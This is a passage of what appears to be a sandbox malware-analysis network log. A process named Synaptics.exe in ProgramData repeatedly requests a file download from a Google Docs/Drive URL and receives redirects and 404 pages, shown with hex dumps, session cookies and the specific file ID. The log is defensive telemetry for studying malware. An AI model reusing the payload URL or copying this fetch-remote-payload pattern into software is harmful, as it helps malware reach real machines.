                                                                                              2025-01-02 19:29:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              58192.168.2.749930216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:04 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:04 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ltuCXmhrNN7dMlRzepam_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              59192.168.2.749938216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:05 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:05 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0lm6-mm9FSJ8TJSd0cibRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              60192.168.2.749939142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7DTrgUj-SUL1WLFTQNp3WIdc1-af3V1miTmlaH9lkVp9VuRkeu4YRsEJ5N8bs_cvwI0sXQQoo
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:05 GMT
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JzoAc3I9O8u3VpNrDtQjYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 46 41 54 5f 76 79 33 75 77 54 33 6d 51 4c 41 74 47 50 6a 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="aFAT_vy3uwT3mQLAtGPj7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              61192.168.2.749940216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:04 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:05 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:05 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-beN5JCy25a1k8Vob8QQQ5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              62192.168.2.749942142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:05 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4u3qQ3HfS40Bb9hR1unAuAxdVkripQx6l-j5a16bqwiuzKztcC6uruaXTz0nCr3LkX
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:05 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6ksq4j7bcLz06X8RYt1J6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:05 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:05 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 46 52 6a 50 41 69 55 7a 45 73 42 32 49 54 6a 63 7a 39 30 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="lFRjPAiUzEsB2ITjcz90oA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:05 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              63192.168.2.749949216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:05 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              64192.168.2.749950142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              65192.168.2.749951216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              66192.168.2.749959216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:07 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tpGbA8ivvwoaPZVG5aheIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              67192.168.2.749958216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:07 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-irYM0hT38J6bgtqYfPpq0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              68192.168.2.749968216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:08 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:08 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-XDgwSX4_tBNKMsoEXJBTsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
